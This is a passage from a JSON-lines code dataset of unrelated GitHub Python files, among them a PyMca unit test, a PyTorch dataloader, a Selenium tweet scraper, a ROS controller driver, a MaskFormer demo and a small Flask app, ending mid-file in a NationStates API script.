\"sole@esrf.fr\"\n__license__ = \"MIT\"\n__copyright__ = \"European Synchrotron Radiation Facility, Grenoble, France\"\nimport unittest\nimport sys\nimport os\nimport gc\nimport tempfile\n\nclass testSpecfilewrapper(unittest.TestCase):\n def setUp(self):\n \"\"\"\n import the module\n \"\"\"\n try:\n from PyMca5.PyMcaIO import specfilewrapper as specfile\n self.specfileClass = specfile\n except Exception:\n self.specfileClass = None\n if self.specfileClass is not None:\n text = \"1.3 1 1\\n\"\n text += \"2.5 4 8\\n\"\n text += \"3.7 9 27\\n\"\n text += \"\\n\"\n tmpFile = tempfile.mkstemp(text=False)\n if sys.version < '3.0':\n os.write(tmpFile[0], text)\n else:\n os.write(tmpFile[0], bytes(text, 'utf-8'))\n os.close(tmpFile[0])\n self.fname = tmpFile[1]\n\n def tearDown(self):\n \"\"\"clean up any possible files\"\"\"\n # make sure the file handle is free\n self._sf = None\n self._scan = None\n # this should free the handle\n gc.collect()\n if self.specfileClass is not None:\n if os.path.exists(self.fname):\n os.remove(self.fname)\n\n def testSpecfilewrapperImport(self):\n #\"\"\"Test successful import\"\"\"\n self.assertTrue(self.specfileClass is not None,\n 'Unsuccessful PyMca5.PyMcaIO.specfilewrapper import')\n\n def testSpecfilewrapperReading(self):\n #\"\"\"Test specfile readout\"\"\"\n self.testSpecfilewrapperImport()\n self._sf = self.specfileClass.Specfile(self.fname)\n # test the number of found scans\n self.assertEqual(len(self._sf), 2,\n 'Expected to read 2 scans, read %s' %\\\n len(self._sf))\n self.assertEqual(self._sf.scanno(), 2,\n 'Expected to read 2 scans, got %s' %\\\n self._sf.scanno())\n # test scan iteration selection method\n self._scan = self._sf[0]\n labels = self._scan.alllabels()\n expectedLabels = ['Point', 'Column 0', 'Column 1', 'Column 2']\n self.assertEqual(len(labels), 4,\n 'Expected to read 4 labels, got %s' % len(labels))\n for i in range(3):\n self.assertEqual(labels[i], expectedLabels[i],\n 'Read \"%s\" instead of \"%s\"' %\\\n (labels[i], expectedLabels[i]))\n\n # test scan number selection method\n self._scan = self._sf.select('1.1')\n labels = self._scan.alllabels()\n expectedLabels = ['Point', 'Column 0', 'Column 1', 'Column 2']\n self.assertEqual(len(labels), 4,\n 'Expected to read 4 labels, got %s' % len(labels))\n for i in range(3):\n self.assertEqual(labels[i], expectedLabels[i],\n 'Read \"%s\" instead of \"%s\"' %\\\n (labels[i], expectedLabels[i]))\n\n # test scan number of mca\n self._scan = self._sf[0]\n nbmca = self._scan.nbmca()\n self.assertEqual(nbmca, 0,\n 'Expected to read 0 mca, got %s' % nbmca)\n\n self._scan = self._sf[1]\n nbmca = self._scan.nbmca()\n self.assertEqual(nbmca, 3,\n 'Expected to read 3 mca, got %s' % nbmca)\n\n def testSpecfilewrapperReadingCompatibleWithUserLocale(self):\n #\"\"\"Test specfile compatible with C locale\"\"\"\n self.testSpecfilewrapperImport()\n self._sf = self.specfileClass.Specfile(self.fname)\n self._scan = self._sf[0]\n datacol = self._scan.datacol(2)\n data = self._scan.data()\n self._sf = None\n self.assertEqual(datacol[0], 1.3,\n 'Read %f instead of %f' %\\\n (datacol[0], 1.3))\n self.assertEqual(datacol[1], 2.5,\n 'Read %f instead of %f' %\\\n (datacol[1], 2.5))\n self.assertEqual(datacol[2], 3.7,\n 'Read %f instead of %f' %\\\n (datacol[2], 3.7))\n self.assertEqual(datacol[1], data[1][1],\n 'Read %f instead of %f' %\\\n (datacol[1], data[1][1]))\n gc.collect()\n\n def testTrainingSpectrumReading(self):\n from PyMca5 import PyMcaDataDir\n import numpy\n fname = os.path.join(PyMcaDataDir.PYMCA_DATA_DIR,\n 'XRFSpectrum.mca')\n self._sf = self.specfileClass.Specfile(fname)\n self._scan = self._sf[0]\n\n # I find awful that starts counting at 1\n # 1 is the point number\n # 2 is the actual spectal data\n datacol = self._scan.datacol(2)\n self._scan = self._sf[1]\n\n # The \"second\" scan is the readout as mca\n mca = self._scan.mca(1)\n self.assertTrue(numpy.all(datacol == mca))\n\ndef getSuite(auto=True):\n testSuite = unittest.TestSuite()\n if auto:\n testSuite.addTest(\\\n unittest.TestLoader().loadTestsFromTestCase(testSpecfilewrapper))\n else:\n # use a predefined order\n testSuite.addTest(testSpecfilewrapper(\"testSpecfilewrapperImport\"))\n testSuite.addTest(testSpecfilewrapper(\"testSpecfilewrapperReading\"))\n testSuite.addTest(\\\n testSpecfilewrapper(\\\n \"testSpecfilewrapperReadingCompatibleWithUserLocale\"))\n testSuite.addTest(testSpecfilewrapper(\"testTrainingSpectrumReading\"))\n return testSuite\n\ndef test(auto=False):\n unittest.TextTestRunner(verbosity=2).run(getSuite(auto=auto))\n\nif __name__ == '__main__':\n test()\n","repo_name":"vasole/pymca","sub_path":"PyMca5/tests/specfilewrapperTest.py","file_name":"specfilewrapperTest.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"35"} +{"seq_id":"37929151440","text":"# tensordata.py\n\nimport torch as th\nimport numpy as np\n\n\n# -------------------------------------------------------------------------\n# Tensor Dataset \n# -------------------------------------------------------------------------\n\n\nclass TDataset:\n \n def __init__ (self, x, y):\n \n if x.shape[0] != y.shape[0]:\n raise Exception(\"x.shape[0] == y.shape[0] must be True\")\n if x.device != y.device:\n raise Exception(\"x.device == y.device must be True\")\n self.x = x\n self.y = y\n self.length = x.shape[0]\n self.indices = None # torch tensor \n \n def __len__ (self):\n \n return self.length\n \n def __getitem__ (self, idx):\n \n if self.indices is not None: \n return self.x[self.indices[idx]], self.y[self.indices[idx]]\n else:\n return self.x[idx], self.y[idx]\n \n def subset (self, idx):\n \n sub = TDataset(self.x, self.y)\n if self.indices is not None: sub.indices = self.indices[idx]\n else: sub.indices = th.tensor(list(idx), device=self.x.device, dtype=th.long)\n sub.length = sub.indices.shape[0]\n return sub\n \n def dataloader (self, method=None, batch_size=None, drop_last=False):\n \n return TDataloader(self, method, batch_size, drop_last)\n\n def random_split (self, TR_size=0.8):\n \n TR_size = int(TR_size*len(self))\n perm = np.random.permutation(len(self)).tolist()\n TR, TS = self.subset(perm[:TR_size]), self.subset(perm[TR_size:])\n return TR, TS\n \n def __repr__ (self):\n \n return \"Tensor Dataset\"\n\n \n# -------------------------------------------------------------------------\n# Tensor Dataloader\n# -------------------------------------------------------------------------\n\n \nclass TDataloader:\n\n def __init__(self, tdataset, method=None, batch_size=None, drop_last=False):\n '''\n method: None or 'shuffle' or 'bootstrap'\n '''\n \n self.dataset = tdataset\n if method not in [None, 'shuffle', 'bootstrap']:\n raise Exception(\"method must be one of these: None, 'shuffle', 'bootstrap'\")\n self.method = method\n if not batch_size: batch_size = len(self.dataset)\n self.batch_size = batch_size\n self.drop_last = drop_last\n n_batches, remainder = divmod(len(self.dataset), self.batch_size)\n if not self.drop_last and remainder > 0: n_batches += 1 \n self.n_batches = n_batches\n self.effective_length = n_batches*batch_size\n \n def __len__(self):\n \n return self.n_batches\n \n def __iter__(self):\n \n if self.method == 'bootstrap':\n idx = np.random.randint(0, len(self.dataset), size=self.effective_length).tolist()\n elif self.method == 'shuffle':\n idx = np.random.permutation(len(self.dataset)).tolist()\n if self.method:\n self.ready_dataset = self.dataset.subset(idx)\n else:\n self.ready_dataset = self.dataset\n self.i = 0\n return self\n\n def __next__(self):\n \n if self.i >= self.effective_length: raise StopIteration\n batch = self.ready_dataset[self.i:self.i+self.batch_size]\n self.i += self.batch_size\n return batch\n\n def __repr__ (self):\n \n return \"Tensor Dataloader\"\n\n\n# -------------------------------------------------------------------------\n# Positive Negative Bootstrap Tensor Dataloader\n# -------------------------------------------------------------------------\n \n \nclass PosNeg_Bootstrap_TDataloader:\n \n def __init__ (self, tdataset, batch_size=None):\n \n self.Nclasses = int(tdataset.y.max().item()) + 1 \n self.tot_length = len(tdataset)*self.Nclasses \n self.dataset = tdataset\n if not batch_size: batch_size = self.tot_length\n self.batch_size = batch_size \n n_batches, remainder = divmod(self.tot_length, self.batch_size)\n if remainder > 0: n_batches += 1 \n self.n_batches = n_batches\n self.effective_length = n_batches*batch_size\n self.device = tdataset.x.device\n self.eye = th.eye(self.Nclasses, device=self.device)\n self.mask = (th.ones(self.batch_size, device=self.device) > 0)\n self.mask[:int(self.batch_size/2)] = False\n \n def __len__ (self):\n \n return self.n_batches\n \n def __iter__ (self):\n \n idx = np.random.randint(0, len(self.dataset), size=self.effective_length).tolist()\n self.ready_dataset = self.dataset.subset(idx)\n self.i = 0\n return self \n\n def __next__ (self):\n \n if self.i >= self.effective_length: raise StopIteration\n x, y = self.ready_dataset[self.i:self.i+self.batch_size]\n self.i += self.batch_size\n \n y = y.flatten()\n stay_positive = th.randperm(self.batch_size, device=self.device)\n stay_positive = self.mask[stay_positive]\n y_fake = th.randint(self.Nclasses-1, (y.shape[0],), device=self.device)\n y_fake = (y_fake >= y) + y_fake\n chosen_y = y_fake*(~stay_positive) + y*stay_positive\n ready_x = th.cat((x, self.eye[chosen_y]), dim=1)\n ready_y = stay_positive.float().reshape(-1, 1)\n return ready_x, ready_y\n\n def __repr__ (self):\n \n return \"Postive Negative Bootstrap Tensor Dataloader\"","repo_name":"MatteoPardi/Entropy-FFA","sub_path":"_tools/utils/tensordata.py","file_name":"tensordata.py","file_ext":"py","file_size_in_byte":5474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5211838026","text":"# Read this first: https://www.w3schools.com/html/default.asp\nfrom selenium import webdriver\nimport time\nimport csv\n\n\"\"\"\nA function that uses selenium and chromedriver to get tweets from a Twitter account.\nurl is the link the account\nscrollNum is the number of times we want to scroll to load more tweets.\n\"\"\"\n\ndef getTweets(url, scrollNum):\n #open the browser and visit the url\n driver = webdriver.Chrome('./chromedriver')\n driver.get(url)\n time.sleep(2)\n\n already_seen=set()#keeps track of tweets we have already seen.\n\n #write the tweets to a file\n fw=open('tweets.txt','w',encoding='utf8')\n writer=csv.writer(fw,lineterminator='\\n')#create a csv writer for this file\n for i in range(scrollNum):\n\n print('batch count',i)\n \n #find all elements that have the value \"tweet\" for the data-testid attribute\n tweets=driver.find_elements_by_css_selector('div[data-testid=\"tweet\"]')#\n print(len(tweets),' tweets found\\n')\n \n for tweet in tweets:\n\n if tweet in already_seen:continue #we have seen this tweet before while scrolling down, ignore\n already_seen.add(tweet) #first time we see this tweet. Mark as seen and process.\n \n txt,retweets='NA','NA'\n \n try: \n txt=tweet.find_element_by_css_selector(\"div.css-901oao.r-hkyrab.r-1qd0xha.r-a023e6.r-16dba41.r-ad9z0x.r-bcqeeo.r-bnwqim.r-qvutc0\").text\n txt=txt.replace('\\n', ' ')\n except: \n print ('no text') \n\n try:\n \n #find the div element that havs the value \"retweet\" for the data-testid attribute\n retweetElement=tweet.find_element_by_css_selector('div[data-testid=\"retweet\"]')\n \n #find the span element that has all the specified values (space separated) in its class attribute\n retweets=retweetElement.find_element_by_css_selector('span.css-901oao.css-16my406.r-1qd0xha.r-ad9z0x.r-bcqeeo.r-qvutc0').text \n \n except:\n print ('no retweets')\n\n #only write tweets that have text or retweets (or both). \n if txt!='NA' or retweets!='NA':\n writer.writerow([txt,retweets])\n\n #scroll down twice to load more tweets\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n \n time.sleep(2)\n\n fw.close()\n print('done')\n\n\nurl='https://twitter.com/SHAQ'\ngetTweets(url,5)","repo_name":"MaitreyPrajapati/BIA-660","sub_path":"week6/selenium_scraper.py","file_name":"selenium_scraper.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26652773659","text":"# -*- coding: utf-8 -*-\nimport pickle\n\nclass Vehiculos():\n\n def __init__(self, marca, modelo):\n self.marca = marca\n self.modelo = modelo\n self.enmarcha = False\n self.acelera = False\n self.frena = False\n\n def arrancar(self):\n self.enmarcha = True\n\n def acelerar(self):\n self.acelera = True\n\n def frenar(self):\n self.frena = True\n\n def estado(self):\n print(\"Marca: \", self.marca, \"\\nModelo: \", self.modelo, \"\\nEn Marcha: \", self.enmarcha, \"\\nAcelerando: \", self.acelera, \"\\nFrena: \", self.frena)\n\ncoche1 = Vehiculos(\"Ford\", \"Mustang\")\ncoche2 = Vehiculos(\"Seat\", \"León\")\ncoche3 = Vehiculos(\"Mazda\", \"CX-5\")\n\ncoches = [coche1, coche2, coche3]\n\nfichero = open(\"40_vehiculos\", \"wb\")\n\npickle.dump(coches, fichero)\n\nfichero.close()\n\ndel(fichero)\n\n# Carga del fichero\n\nficheroApertura = open(\"40_vehiculos\", \"rb\")\n\nmisCoches = pickle.load(ficheroApertura)\n\nficheroApertura.close()\n\nfor x in misCoches:\n print(x.estado(), \"\\n ---------- \")","repo_name":"jask05/PythonCourse","sub_path":"Ejercicios/40_serializacion_objetos_ii.py","file_name":"40_serializacion_objetos_ii.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29120060374","text":"class Record(object):\n record_list = []\n\n def add_record(self):\n name = input('请输入用户名:')\n tel = input('请输入手机号:')\n d = {\n '姓名': name,\n 'tel': tel\n }\n print(d)\n self.record_list.append(d.copy())\n print('保存成功')\n # print(self.record_list)\n\n def query_record(self):\n name = input('请输入要查询的用户名:')\n\n for i in self.record_list:\n if name in i.get('姓名'):\n print(i)\n break\n else:\n print('没有找到该联系人')\n\n def delete_recode(self):\n name = input('请输入你要删除的用户名:')\n for i in self.record_list:\n if name in i.get('姓名'):\n index = self.record_list.index(i)\n self.record_list.pop(index)\n print('用户删除成功')\n break\n else:\n print('用户不存在')\n\n def change_record(self):\n name = input('请输入要修改的用户名:')\n for i in self.record_list:\n if name in i['姓名']:\n tel = input('请输入修改后的手机号;')\n i['tel'] = tel\n print(i)\n print('修改成功')\n break\n\n else:\n print('该用户不存在')\n\n def main(self):\n while True:\n print('------------通讯录菜单----------')\n print('请按提示操作')\n print('1.添加联系人')\n print('2.查询联系人')\n print('3.修改联系人')\n print('4.删除联系人')\n print('5.按q退出')\n zhiling = input('请输入指令:')\n if zhiling == '1':\n self.add_record()\n elif zhiling == '2':\n self.query_record()\n elif zhiling == '3':\n self.change_record()\n elif zhiling == '4':\n self.delete_recode()\n elif zhiling == 'q':\n break\n else:\n print('指令有误,重新输入')\n\n\nif __name__ == '__main__':\n # zz = []\n r = Record()\n # r.add_record()\n # print(r.record_list)\n # print(zz)\n # r.query_record()\n # r.change_record()\n # r.delete_recode()\n r.main()\n\n\n","repo_name":"zhangjixing0809/gittest2","sub_path":"homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14062645580","text":"#!/usr/bin/env python3\n\nfrom ds4_driver.logger import Logger\nfrom ds4_driver.controller_ros import ControllerRos\n\nfrom ds4drv.backends import BluetoothBackend, HidrawBackend\nfrom ds4drv.exceptions import BackendError\n\nimport rclpy\nfrom threading import Thread\n\nimport signal\nimport sys\n\n\nclass SignalHandler(object):\n def __init__(self, controller, logger):\n self.controller = controller\n self._logger = logger\n\n def __call__(self, signum, frame):\n self._logger.info(\"Shutting down...\")\n self.controller.exit()\n rclpy.shutdown()\n sys.exit(0)\n\n\ndef main():\n rclpy.init()\n node = rclpy.create_node(\"ds4_driver_node\")\n node.declare_parameter(\"device_addr\", \"\")\n node.declare_parameter(\"backend\", \"hidraw\")\n device_addr = node.get_parameter(\"device_addr\").value\n backend_type = node.get_parameter(\"backend\").value\n\n logger = node.get_logger()\n\n controller = ControllerRos(node)\n\n sigint_handler = SignalHandler(controller, logger)\n # Since backend.devices is a non-ROS iterator that doesn't consider\n # rclpy.is_shutdown(), the program freezes upon receiving SIGINT when\n # using rclpy.on_shutdown. Thus, we need to define our shutdown sequence\n # using signal.signal as is done in the original ds4drv script.\n signal.signal(signal.SIGINT, sigint_handler)\n\n if backend_type == \"bluetooth\":\n backend = BluetoothBackend(Logger(\"backend\"))\n else:\n backend = HidrawBackend(Logger(\"backend\"))\n\n try:\n backend.setup()\n except BackendError as err:\n logger.error(err)\n rclpy.signal_shutdown(str(err))\n sys.exit(1)\n\n spin_thread = Thread(target=rclpy.spin, args=(node,))\n spin_thread.start()\n\n for device in backend.devices:\n logger.info(\"Connected to {0}\".format(device.name))\n if device_addr in (None, \"\", device.device_addr):\n controller.setup_device(device)\n if not controller.is_alive():\n controller.start()\n controller.loop.register_event(\"device-report\", controller.cb_report)\n else:\n logger.error(\"...but it's not the one we're looking for :(\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"naoki-mizuno/ds4_driver","sub_path":"ds4_driver/nodes/ds4_driver_node.py","file_name":"ds4_driver_node.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"35"} +{"seq_id":"30292903150","text":"from django.forms import (\n CheckboxSelectMultiple,\n ChoiceField,\n ModelForm,\n ModelMultipleChoiceField,\n Select,\n SelectMultiple,\n TextInput,\n)\n\nfrom apps.destinacao.models import Destinacao\nfrom apps.fornecedor.models import Fornecedor\n\n\nclass FornecedorForm(ModelForm):\n TP_FORNECEDOR_CHOICES = [\n (None, \"Selecione...\"),\n (\"Resíduos\", \"Resíduos\"),\n (\"Água\", \"Água\"),\n (\"Eletricidade\", \"Eletricidade\"),\n (\"Combustível\", \"Combustível\"),\n ]\n\n tp_fornecedor = ChoiceField(\n label=\"Tipo Fornecedor\",\n choices=TP_FORNECEDOR_CHOICES,\n widget=Select(attrs={\"class\": \"form-select\"}),\n )\n\n destinacao = ModelMultipleChoiceField(\n label=\"Destinação\",\n queryset=Destinacao.objects.all(),\n widget=CheckboxSelectMultiple(attrs={\"class\": \"form-check-input mb-0\"}),\n required=False,\n )\n\n class Meta:\n model = Fornecedor\n\n fields = [\"nome\", \"tp_fornecedor\", \"destinacao\"]\n labels = {\n \"nome\": \"Nome\",\n \"tp_fornecedor\": \"Tipo Fornecedor\",\n \"destinacao\": \"Destinação\",\n }\n\n widgets = {\n \"nome\": TextInput(\n attrs={\n \"class\": \"form-control\",\n \"placeholder\": \"Nome do Fornecedor\",\n },\n ),\n }\n","repo_name":"jtsilverio/django-gestao-residuos","sub_path":"apps/fornecedor/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"18157116012","text":"import json\nimport msgpack\n\nwith open('products_65.json', 'r') as file:\n taskJSON = json.load(file)\n\nproducts = {}\n\nfor item in taskJSON:\n if item['name'] in products:\n products[item['name']].append(item['price'])\n else:\n products[item['name']] = list()\n products[item['name']].append(item['price'])\n\nproductsParams = list()\n\nfor keys in products:\n averagePrice = sum(products[keys])/len(products[keys])\n minPrice = min(products[keys])\n maxPrice = max(products[keys])\n productsParams.append({'name': keys, 'averagePrice': averagePrice, 'maxPrice': maxPrice, 'minPrice': minPrice})\n\nwith open('answer_3_var_65.json', 'w') as answer:\n json.dump(productsParams, answer)\n\n\nproductsParamsMSGPACK = msgpack.packb(productsParams)\n\nwith open('msgpack_answer_3_var_65.msgpack', 'wb') as msgpackAnswer:\n msgpackAnswer.write(productsParamsMSGPACK)\n\n# Размер msgpack немного меньше, чем у json","repo_name":"VycheslavRussu/data-engineering-course","sub_path":"practical-exercise-2/task-3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16527775064","text":"class Counter:\n\n \"\"\"Models a counter\"\"\"\n\n # class variable\n instances = 0\n # 定义私有属性\n __weight = 100\n\n # 构造方法 创建实例的时候 默认调用该方法, 构造方法可以指定参数 self 不是python关键字 换成别的变量也可以运行\n def __init__(self, _value=0):\n # Set up the counter to 0\n print(\"counter 构造方法被调用\")\n Counter.instances += 1\n self._value = _value\n\n # Mutator method\n def reset(self):\n self._value = 0\n print(self.__weight)\n\n def increment(self, amount=1):\n self._value += amount\n\n def decrement(self, amount = 1):\n self._value -= amount\n\n def get_value(self):\n return self._value\n\n # 重写 toString 方法\n def __str__(self):\n return str(self._value)\n\n # 重写 eq 方法\n def __eq__(self, other):\n if self is other: return True\n if type(self) != type(other): return False\n return self._value == other._value\n\n\n# 继承 除了类,还可以用表达式��基类定义在另一个模块中时这一点非常有用 class DerivedClassName(modname.BaseClassName):\nclass MultiplyCounter(Counter):\n\n def multiply(self, num=2):\n self._value *= num\n\n\ndef counter_test():\n c1 = Counter()\n print(c1)\n print(c1.get_value())\n print(c1.__str__())\n c1.increment()\n print(c1)\n c1.increment(5)\n print(c1)\n c1.reset()\n print(c1)\n c2 = Counter()\n print(Counter.instances)\n print(c1 == c2)\n c1 = 0\n print(c1 == c2)\n\n\n multiply = MultiplyCounter(10)\n print(multiply)\n multiply.multiply()\n print(multiply)\n\n\nif __name__ == \"__main__\":\n counter_test()\n\n","repo_name":"z344945251/PythonDemo","sub_path":"src/main/python/com/cabbage/basic/example/class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14651699091","text":"import argparse\nimport glob\nimport multiprocessing as mp\nimport os\n\n# fmt: off\nimport sys\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\n# fmt: on\n\nimport tempfile\nimport time\nimport warnings\n\nimport cv2\nimport numpy as np\nimport tqdm\n\nfrom detectron2.config import get_cfg\nfrom detectron2.data.detection_utils import read_image\nfrom detectron2.projects.deeplab import add_deeplab_config\nfrom detectron2.utils.logger import setup_logger\n\nfrom mask_former import add_mask_former_config\nfrom predictor import VisualizationDemo\n\nfrom sklearn.manifold import TSNE\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n# constants\nWINDOW_NAME = \"MaskFormer demo\"\n\nclass_names = {\n \"pascal\": [\"aeroplane\",\n \"bicycle\",\n \"bird\",\n \"boat\",\n \"bottle\",\n \"bus\",\n \"car\",\n \"cat\",\n \"chair\",\n \"cow\",\n \"diningtable\",\n \"dog\",\n \"horse\",\n \"motorbike\",\n \"person\",\n \"potted plant\",\n \"sheep\",\n \"sofa\",\n \"train\",\n \"tvmonitor\"]\n}\n\n\ndef setup_cfg(args):\n # load config from file and command-line arguments\n cfg = get_cfg()\n add_deeplab_config(cfg)\n add_mask_former_config(cfg)\n cfg.merge_from_file(args.config_file)\n cfg.merge_from_list(args.opts)\n cfg.freeze()\n return cfg\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(description=\"Detectron2 demo for builtin configs\")\n parser.add_argument(\n \"--config-file\",\n default=\"configs/ade20k-150/maskformer_R50_bs16_160k.yaml\",\n metavar=\"FILE\",\n help=\"path to config file\",\n )\n parser.add_argument(\"--webcam\", action=\"store_true\", help=\"Take inputs from webcam.\")\n parser.add_argument(\"--video-input\", help=\"Path to video file.\")\n parser.add_argument(\n \"--input\",\n nargs=\"+\",\n help=\"A list of space separated input images; \"\n \"or a single glob pattern such as 'directory/*.jpg'\",\n )\n parser.add_argument(\n \"--output\",\n help=\"A file or directory to save output visualizations. \"\n \"If not given, will show output in an OpenCV window.\",\n )\n\n parser.add_argument(\n \"--confidence-threshold\",\n type=float,\n default=0.5,\n help=\"Minimum score for instance predictions to be shown\",\n )\n parser.add_argument(\n \"--opts\",\n help=\"Modify config options using the command-line 'KEY VALUE' pairs\",\n default=[],\n nargs=argparse.REMAINDER,\n )\n return parser\n\n\ndef test_opencv_video_format(codec, file_ext):\n with tempfile.TemporaryDirectory(prefix=\"video_format_test\") as dir:\n filename = os.path.join(dir, \"test_file\" + file_ext)\n writer = cv2.VideoWriter(\n filename=filename,\n fourcc=cv2.VideoWriter_fourcc(*codec),\n fps=float(30),\n frameSize=(10, 10),\n isColor=True,\n )\n [writer.write(np.zeros((10, 10, 3), np.uint8)) for _ in range(30)]\n writer.release()\n if os.path.isfile(filename):\n return True\n return False\n\n\nif __name__ == \"__main__\":\n mp.set_start_method(\"spawn\", force=True)\n args = get_parser().parse_args()\n \n import easydict\n \n # args = easydict.EasyDict({\n # \"config_file\": \"./configs/pascal_voc/zegformer_R101_bs32_30k_vit16_voc_gzss_eval.yaml\",\n # \"input\": [\"/mnt/server14_hard1/msson/datasets/zs3_datasets/VOCZERO/images/val/*.jpg\"],\n # \"opts\": [\"MODEL.WEIGHTS\",\"./trained/given/zegformer_R101_bs32_10k_vit16_voc.pth\"],\n # \"output\": None\n # })\n \n setup_logger(name=\"fvcore\")\n logger = setup_logger()\n logger.info(\"Arguments: \" + str(args))\n\n cfg = setup_cfg(args)\n\n demo = VisualizationDemo(cfg)\n\n if args.input:\n if len(args.input) == 1:\n args.input = glob.glob(os.path.expanduser(args.input[0]))\n assert args.input, \"The input path(s) was not found\"\n for path in tqdm.tqdm(args.input, disable=not args.output):\n # use PIL, to be consistent with evaluation\n img = read_image(path, format=\"BGR\")\n start_time = time.time()\n mask_pred_results, cls_score = demo.get_mask_embedding(img)\n cls_idx = cls_score.argmax(dim=-1).squeeze()\n # cls_score = cls_score / cls_score.norm(dim=-1, keepdim=True)\n\n \n import torch\n import torchvision\n from torch.nn import functional as F\n from PIL import Image\n \n mask_pred_results = F.interpolate(\n mask_pred_results,\n size=(img.shape[0], img.shape[1]),\n mode=\"bilinear\",\n align_corners=False,\n ).cpu()\n \n mask_results = torch.where(mask_pred_results > 0.5, torch.tensor([1.]), torch.tensor([0.]))\n trans = torchvision.transforms.Lambda(lambda x: x.repeat(3, 1, 1) if x.size(0)==1 else x)\n \n img = torchvision.transforms.ToTensor()(img.copy())\n alpha = 0.5\n # for i in range(100):\n # # confidence = cls_score[0,i,:].max(dim=-1)[0].sigmoid().item()\n # confidence = logits_per_image[i,:].max(dim=-1)[0].sigmoid().item()\n # # if confidence <= 0.5: ## confidence score 0.5 초과만 visualization\n # # continue\n # mask_result = trans(mask_results[:,i,...])\n # blended = alpha*mask_result + (1-alpha)*img\n \n # print(\"image_path: \", path)\n # # print(class_names['pascal'][cls_score[0,i,:].argmax(dim=-1)])\n # print(class_names['pascal'][logits_per_image[i,:].argmax(dim=-1)])\n # print(\"confidence: \", confidence)\n # plt.imshow(blended.permute(1,2,0))\n # plt.show()\n \n ## Check all masks at once\n for i in range(100):\n mask_result = trans(mask_results[:,i,...])\n if i == 0 :\n blended = mask_result\n else:\n blended += mask_result\n \n print(\"image_path: \", path)\n print(class_names['pascal'][cls_idx[i]])\n print(\"confidence: \", confidence)\n # plt.imshow(blended.permute(1,2,0))\n # plt.show()\n","repo_name":"ksos104/ZS3","sub_path":"demo/demo_mask_vis.py","file_name":"demo_mask_vis.py","file_ext":"py","file_size_in_byte":6542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25237796003","text":"from flask import Flask, redirect, render_template, request\nfrom weather import get_temp\n\napp = Flask(__name__) # an instance of Flask\n\n\n# If the website domain is www.xyz.com, http://www.xyz.com/ will trigger the function below\n# @app.route(\"/\")\n# def index():\n# return \"

    Hello, World!

    \"\n\n\n# If the website domain is www.xyz.com, http://www.xyz.com/hello and http://www.xyz.com/hello/ will trigger the function below\n@app.route(\"/\")\n@app.route(\"/hello/\")\n@app.route(\"/hello/\")\ndef hello(name=None):\n if name:\n return render_template(\"hello.html\", username=name)\n return render_template(\"hello.html\")\n\n\n# Create another route like '/square/', so the web app will display the square of the number\n@app.route(\"/square/\")\ndef square(num=None):\n if num:\n result = float(num) ** 2\n return f\"The square of {num} is {result}.\"\n return \"You need to provide a number.\"\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template(\"404.html\")\n\n\n# @app.route(\"/weather/\", methods=[\"GET\", \"POST\"])\n# def get_weather():\n# if request.method == \"POST\":\n# city_name = request.form.get(\"city\")\n# temp = get_temp(city_name)\n# return f\"The current temprature at the city {city_name} is {temp}.\"\n# else:\n# return render_template(\"weather-form.html\")\n\n\n@app.get(\"/weather/\")\ndef weather_get():\n return render_template(\"weather-form.html\")\n\n\n@app.post(\"/weather/\")\ndef weather_post():\n city_name = request.form.get(\"city\")\n temp = get_temp(city_name)\n return f\"The current temprature at the city {city_name} is {temp}.\"\n\n\nSTUDENTS = {}\nCOURSES = [\"Python\", \"Web\", \"Cybercurity\", \"Mobile App\"]\n\n\n@app.route(\"/students/\")\ndef show_students():\n return render_template(\"students.html\", students=STUDENTS)\n\n\n@app.get(\"/register/\")\ndef register_get():\n return render_template(\"register-form.html\", courses=COURSES)\n\n\n@app.post(\"/register/\")\ndef register_post():\n # validate name course\n name = request.form.get(\"name\")\n course = request.form.get(\"course\")\n if course not in COURSES:\n return \"Hi hacker, you cannot register this course!\"\n STUDENTS[name] = course\n # return \"Successfullly registered.\"\n return redirect(\"/students/\")\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"OIM3640/oim3640","sub_path":"hello-flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"19342660970","text":"\"\"\"Retrieves the WA residents of a region\"\"\"\n\nimport argparse\nimport logging\nimport sys\nimport typing as t\nfrom typing import Collection, Iterable\n\nimport config\nimport nsapi\n\n# Set logging level\nlevel = logging.WARNING\n# Name logger\nlogger = logging.getLogger()\n# Configure loggers\nnsapi.configure_logger(logger, level=level)\nnsapi.configure_logger(nsapi.logger, level=level)\n\n\ndef residents(requester: nsapi.NSRequester, region: str) -> Collection[str]:\n \"\"\"Retrieves the WA residents of the given region.\"\"\"\n\n # 